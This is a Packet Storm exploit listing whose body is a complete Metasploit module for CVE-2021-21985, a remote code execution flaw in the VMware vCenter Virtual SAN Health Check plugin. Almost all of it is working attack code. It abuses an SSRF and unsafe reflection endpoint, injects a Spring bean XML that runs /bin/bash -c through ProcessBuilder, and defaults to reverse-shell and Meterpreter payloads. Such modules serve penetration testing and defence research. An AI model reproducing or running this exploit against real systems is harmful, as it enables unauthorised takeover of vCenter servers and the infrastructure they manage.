Lucene search

K
packetstorm
WvuPACKETSTORM:163487
HistoryJul 13, 2021 - 12:00 a.m.

VMware vCenter Server Virtual SAN Health Check Remote Code Execution

2021-07-1300:00:00
wvu
packetstormsecurity.com
830
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
  
Rank = ExcellentRanking  
  
prepend Msf::Exploit::Remote::AutoCheck  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'VMware vCenter Server Virtual SAN Health Check Plugin RCE',  
'Description' => %q{  
This module exploits Java unsafe reflection and SSRF in the VMware  
vCenter Server Virtual SAN Health Check plugin's ProxygenController  
class to execute code as the vsphere-ui user.  
  
See the vendor advisory for affected and patched versions. Tested  
against VMware vCenter Server 6.7 Update 3m (Linux appliance).  
},  
'Author' => [  
'Ricter Z', # Discovery and PoC used  
'wvu' # Analysis and exploit  
],  
'References' => [  
['CVE', '2021-21985'],  
['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0010.html'],  
['URL', 'https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis'],  
['URL', 'http://noahblog.360.cn/vcenter-cve-2021-2021-21985/'],  
# Other great writeups!  
['URL', 'https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/'],  
['URL', 'https://testbnull.medium.com/a-quick-look-at-cve-2021-21985-vcenter-pre-auth-rce-9ecd459150a5'],  
['URL', 'https://y4y.space/2021/06/04/learning-jndi-injection-from-cve-2021-21985/'],  
['URL', 'https://github.com/alt3kx/CVE-2021-21985_PoC']  
],  
'DisclosureDate' => '2021-05-25',  
'License' => MSF_LICENSE,  
'Platform' => ['unix', 'linux'], # TODO: Windows?  
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],  
'Privileged' => false,  
'Targets' => [  
[  
'Unix Command',  
{  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'Type' => :unix_cmd,  
'DefaultOptions' => {  
'PAYLOAD' => 'cmd/unix/reverse_python_ssl'  
}  
}  
],  
[  
'Linux Dropper',  
{  
'Platform' => 'linux',  
'Arch' => [ARCH_X86, ARCH_X64],  
'Type' => :linux_dropper,  
'DefaultOptions' => {  
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'  
}  
}  
]  
],  
'DefaultTarget' => 0,  
'DefaultOptions' => {  
'RPORT' => 443,  
'SSL' => true  
},  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [FIRST_ATTEMPT_FAIL], # SSRF can be a little finicky  
'SideEffects' => [  
IOC_IN_LOGS, # /var/log/vmware/vsphere-ui/logs/vsphere_client_virgo.log  
ARTIFACTS_ON_DISK # CmdStager  
]  
}  
)  
)  
  
register_options([  
OptString.new('TARGETURI', [true, 'Base path', '/'])  
])  
end  
  
def check  
# https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(  
target_uri.path,  
'/ui/h5-vsan/rest/proxy/service/systemProperties/getProperty'  
),  
'ctype' => 'application/json',  
'data' => {  
'methodInput' => ['user.name', nil]  
}.to_json  
)  
  
return CheckCode::Unknown unless res  
  
unless res.code == 200 && res.get_json_document['result'] == 'vsphere-ui'  
return CheckCode::Safe  
end  
  
CheckCode::Vulnerable('System property user.name is vsphere-ui.')  
end  
  
def exploit  
print_status("Executing #{payload_instance.refname} (#{target.name})")  
  
case target['Type']  
when :unix_cmd  
execute_command(payload.encoded)  
when :linux_dropper  
execute_cmdstager  
end  
end  
  
def execute_command(cmd, _opts = {})  
vprint_status(cmd)  
  
url = OfflineBundle.new(cmd).to_url  
  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(  
target_uri.path,  
'/ui/h5-vsan/rest/proxy/service/vmodlContext/loadVmodlPackages'  
),  
'ctype' => 'application/json',  
'data' => {  
'methodInput' => [  
["https://localhost/vsanHealth/vum/driverOfflineBundle/#{url}"],  
false # lazyInit  
]  
}.to_json  
)  
  
fail_with(Failure::PayloadFailed, cmd) unless res&.code == 200  
end  
  
class OfflineBundle  
attr_accessor :cmd  
  
def initialize(cmd)  
@cmd = cmd  
end  
  
def to_xml  
bean = Rex::Text.rand_text_alpha_lower(8..16)  
prop = Rex::Text.rand_text_alpha_lower(8..16)  
  
# https://www.tutorialspoint.com/spring/spring_bean_definition.htm  
<<~XML  
<beans>  
<bean id="#{bean}" class="java.lang.ProcessBuilder">  
<constructor-arg>  
<list>  
<value>/bin/bash</value>  
<value>-c</value>  
<value><![CDATA[#{cmd}]]></value>  
</list>  
</constructor-arg>  
<property name="#{prop}" value="\#{#{bean}.start()}"/>  
</bean>  
</beans>  
XML  
end  
  
def to_zip  
Msf::Util::EXE.to_zip([  
fname: 'offline_bundle.xml',  
data: to_xml.gsub(/^\s+/, '').tr("\n", '')  
])  
end  
  
def to_url  
# https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/Data_URIs  
"data:application/zip;base64,#{Rex::Text.encode_base64(to_zip)}"  
end  
end  
  
end  
`
How to find holes in your network?

Try incredible fast Vulners Perimeter Scanner and find vulnerabilities and unnecessary ip and ports in network devices inside your network before anyone else.

Try Network Scanner
Related for PACKETSTORM:163487